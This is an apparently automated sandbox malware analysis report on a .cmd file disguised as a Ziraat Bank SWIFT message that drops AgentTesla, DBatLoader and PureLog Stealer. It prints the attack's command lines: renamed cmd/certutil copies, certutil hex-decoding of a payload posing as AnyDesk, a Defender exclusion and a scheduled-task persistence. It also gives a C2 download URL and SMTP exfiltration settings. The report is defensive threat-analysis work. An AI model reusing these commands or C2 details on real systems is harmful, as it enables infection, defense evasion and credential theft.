Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd

Overview

General Information

Sample name:Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd
Analysis ID:1557469
MD5:55275e90f2a4ca23422103276e8eae71
SHA1:1799345fb5bf3cf04c44bfa5b59790c9e4e8a0af
SHA256:0bd7bd207364b329f44fec39787189cc5755e9fc1a714cbf3b57be785e224596
Tags:cmduser-lowmal3
Infos:

Detection

AgentTesla, DBatLoader, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected DBatLoader
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates files in the system32 config directory
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops large PE files
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Infects executable files (exe, dll, sys, html)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Queries random domain names (often used to prevent blacklisting and sinkholes)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Registers a new ROOT certificate
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Program Location with Network Connections
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Connects to many different domains
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Executes massive DNS lookups (> 100)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Spawns drivers
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 7576 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 7820 cmdline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 7864 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 7880 cmdline: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 7916 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 7936 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 8028 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 8044 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • AnyDesk.PIF (PID: 8060 cmdline: C:\Users\Public\Libraries\AnyDesk.PIF MD5: E02910D2D83F40FAEF8719A99EE0EF5B)
      • cmd.exe (PID: 6368 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • esentutl.exe (PID: 5612 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
        • esentutl.exe (PID: 6212 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • esentutl.exe (PID: 6448 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
        • conhost.exe (PID: 6472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • aymtmquJ.pif (PID: 6196 cmdline: C:\Users\Public\Libraries\aymtmquJ.pif MD5: C116D3604CEAFE7057D77FF27552C215)
        • Native_neworigin.exe (PID: 7256 cmdline: "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe" MD5: 9ECE2AAE8E8FA77849268DDA20CAEC7B)
        • Trading_AIBot.exe (PID: 1240 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)
          • powershell.exe (PID: 2204 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 1528 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • schtasks.exe (PID: 8056 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:02 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • alpha.exe (PID: 8072 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 8092 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • alg.exe (PID: 7888 cmdline: C:\Windows\System32\alg.exe MD5: 1E467BDA5911F0899BC6AC04CDE8ACA5)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 916 cmdline: C:\Windows\system32\AppVClient.exe MD5: 6341995A4613FCE6AD6219013E4B7646)
  • Juqmtmya.PIF (PID: 2180 cmdline: "C:\Users\Public\Libraries\Juqmtmya.PIF" MD5: E02910D2D83F40FAEF8719A99EE0EF5B)
    • aymtmquJ.pif (PID: 3508 cmdline: C:\Users\Public\Libraries\aymtmquJ.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • Native_neworigin.exe (PID: 3996 cmdline: "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe" MD5: 9ECE2AAE8E8FA77849268DDA20CAEC7B)
      • Trading_AIBot.exe (PID: 5920 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)
  • Juqmtmya.PIF (PID: 2088 cmdline: "C:\Users\Public\Libraries\Juqmtmya.PIF" MD5: E02910D2D83F40FAEF8719A99EE0EF5B)
    • aymtmquJ.pif (PID: 6136 cmdline: C:\Users\Public\Libraries\aymtmquJ.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://gxe0.com/yak2/233_Juqmtmyadyy"]}

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Host": "info2@j-fores.com", "Username": "info@j-fores.com", "Password": "18 Nov 2024 04:29:17 -0500"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001B.00000002.1722177417.000000000305A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000002B.00000003.1635956799.0000000000705000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      0000002B.00000002.1772725476.0000000002A26000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        0000000F.00000003.1311463700.000000007FC50000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
          0000002B.00000002.1784000004.0000000002E20000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 14 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            27.2.Native_neworigin.exe.52d0f08.5.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              43.2.Native_neworigin.exe.2a6711e.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                43.2.Native_neworigin.exe.5700000.8.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  27.2.Native_neworigin.exe.5360000.7.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    27.2.Native_neworigin.exe.2fe0000.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      Click to see the 33 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 8060, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                      Sigma detected: Execution from Suspicious Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7576, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 7864, ProcessName: alpha.exe
                      Sigma detected: New RUN Key Pointing to Suspicious Folder
                      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Juqmtmya.url, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 8060, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Juqmtmya
                      Sigma detected: Parent in Public Folder Suspicious Process
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: {ki, Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 7864, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 7880, ProcessName: extrac32.exe
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 1240, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 2204, ProcessName: powershell.exe
                      Sigma detected: Suspicious Program Location with Network Connections
                      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 198.252.105.91, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Libraries\AnyDesk.PIF, Initiated: true, ProcessId: 8060, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49730
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Juqmtmya.url, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 8060, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Juqmtmya
                      Sigma detected: Execution of Suspicious File Type Extension
                      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\AnyDesk.PIF, CommandLine: C:\Users\Public\Libraries\AnyDesk.PIF, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\AnyDesk.PIF, NewProcessName: C:\Users\Public\Libraries\AnyDesk.PIF, OriginalFileName: C:\Users\Public\Libraries\AnyDesk.PIF, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7576, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 8060, ProcessName: AnyDesk.PIF
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 1240, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 2204, ProcessName: powershell.exe
                      Sigma detected: Startup Folder File Write
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ProcessId: 1240, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                      Sigma detected: Suspicious Add Scheduled Task Parent
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:02 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:02 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 1240, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:02 /du 23:59 /sc daily /ri 1 /f, ProcessId: 8056, ProcessName: schtasks.exe
                      Sigma detected: Suspicious Outbound SMTP Connections
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe, Initiated: true, ProcessId: 7256, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49859
                      Sigma detected: Suspicious Schtasks From Env Var Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:02 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:02 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 1240, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:02 /du 23:59 /sc daily /ri 1 /f, ProcessId: 8056, ProcessName: schtasks.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 1240, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 2204, ProcessName: powershell.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-18T09:57:16.977508+010020283713Unknown Traffic192.168.2.1049731198.252.105.91443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-18T09:59:52.433980+010020516541A Network Trojan was detected192.168.2.10513421.1.1.153UDP
                      2024-11-18T10:00:14.570669+010020516541A Network Trojan was detected192.168.2.10572501.1.1.153UDP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-18T09:59:19.336687+010020516511A Network Trojan was detected192.168.2.10507271.1.1.153UDP
                      2024-11-18T09:59:48.807296+010020516511A Network Trojan was detected192.168.2.10530301.1.1.153UDP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-18T09:59:46.275027+010020516531A Network Trojan was detected192.168.2.10650431.1.1.153UDP
                      2024-11-18T10:00:08.841230+010020516531A Network Trojan was detected192.168.2.10558451.1.1.153UDP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-18T10:00:01.748310+010020516501A Network Trojan was detected192.168.2.10573931.1.1.153UDP
                      2024-11-18T10:00:21.993688+010020516501A Network Trojan was detected192.168.2.10562351.1.1.153UDP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-18T10:00:26.497191+010020516521A Network Trojan was detected192.168.2.10516781.1.1.153UDP
                      2024-11-18T10:00:42.381982+010020516521A Network Trojan was detected192.168.2.10548411.1.1.153UDP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-18T09:57:38.352389+010020516491A Network Trojan was detected192.168.2.10653371.1.1.153UDP
                      2024-11-18T09:57:41.443007+010020516491A Network Trojan was detected192.168.2.10623951.1.1.153UDP
                      2024-11-18T09:58:20.626004+010020516491A Network Trojan was detected192.168.2.10623891.1.1.153UDP
                      2024-11-18T10:00:46.809330+010020516491A Network Trojan was detected192.168.2.10643761.1.1.153UDP
                      2024-11-18T10:00:59.215356+010020516491A Network Trojan was detected192.168.2.10633271.1.1.153UDP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-18T09:57:36.575900+010020516481A Network Trojan was detected192.168.2.10573241.1.1.153UDP
                      2024-11-18T09:57:38.044740+010020516481A Network Trojan was detected192.168.2.10629371.1.1.153UDP
                      2024-11-18T09:58:19.231096+010020516481A Network Trojan was detected192.168.2.10555941.1.1.153UDP
                      2024-11-18T10:00:45.214064+010020516481A Network Trojan was detected192.168.2.10574861.1.1.153UDP
                      2024-11-18T10:00:57.859145+010020516481A Network Trojan was detected192.168.2.10497261.1.1.153UDP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-18T09:57:29.615807+010020181411A Network Trojan was detected54.244.188.17780192.168.2.1049801TCP
                      2024-11-18T09:57:32.879896+010020181411A Network Trojan was detected18.141.10.10780192.168.2.1049813TCP
                      2024-11-18T09:57:35.956534+010020181411A Network Trojan was detected44.221.84.10580192.168.2.1049837TCP
                      2024-11-18T09:58:15.074598+010020181411A Network Trojan was detected47.129.31.21280192.168.2.1050000TCP
                      2024-11-18T09:58:23.402709+010020181411A Network Trojan was detected34.246.200.16080192.168.2.1050015TCP
                      2024-11-18T09:58:31.308675+010020181411A Network Trojan was detected3.94.10.3480192.168.2.1050022TCP
                      2024-11-18T09:58:35.578854+010020181411A Network Trojan was detected34.211.97.4580192.168.2.1050027TCP
                      2024-11-18T09:58:44.845442+010020181411A Network Trojan was detected18.246.231.12080192.168.2.1050034TCP
                      2024-11-18T09:58:45.663337+010020181411A Network Trojan was detected18.208.156.24880192.168.2.1050035TCP
                      2024-11-18T09:58:49.060851+010020181411A Network Trojan was detected13.251.16.15080192.168.2.1050037TCP
                      2024-11-18T09:59:09.939784+010020181411A Network Trojan was detected35.164.78.20080192.168.2.1050066TCP
                      2024-11-18T09:59:19.305680+010020181411A Network Trojan was detected3.254.94.18580192.168.2.1050079TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-18T09:57:29.615807+010020377711A Network Trojan was detected54.244.188.17780192.168.2.1049801TCP
                      2024-11-18T09:57:32.879896+010020377711A Network Trojan was detected18.141.10.10780192.168.2.1049813TCP
                      2024-11-18T09:57:35.956534+010020377711A Network Trojan was detected44.221.84.10580192.168.2.1049837TCP
                      2024-11-18T09:58:15.074598+010020377711A Network Trojan was detected47.129.31.21280192.168.2.1050000TCP
                      2024-11-18T09:58:23.402709+010020377711A Network Trojan was detected34.246.200.16080192.168.2.1050015TCP
                      2024-11-18T09:58:31.308675+010020377711A Network Trojan was detected3.94.10.3480192.168.2.1050022TCP
                      2024-11-18T09:58:35.578854+010020377711A Network Trojan was detected34.211.97.4580192.168.2.1050027TCP
                      2024-11-18T09:58:44.845442+010020377711A Network Trojan was detected18.246.231.12080192.168.2.1050034TCP
                      2024-11-18T09:58:45.663337+010020377711A Network Trojan was detected18.208.156.24880192.168.2.1050035TCP
                      2024-11-18T09:58:49.060851+010020377711A Network Trojan was detected13.251.16.15080192.168.2.1050037TCP
                      2024-11-18T09:59:09.939784+010020377711A Network Trojan was detected35.164.78.20080192.168.2.1050066TCP
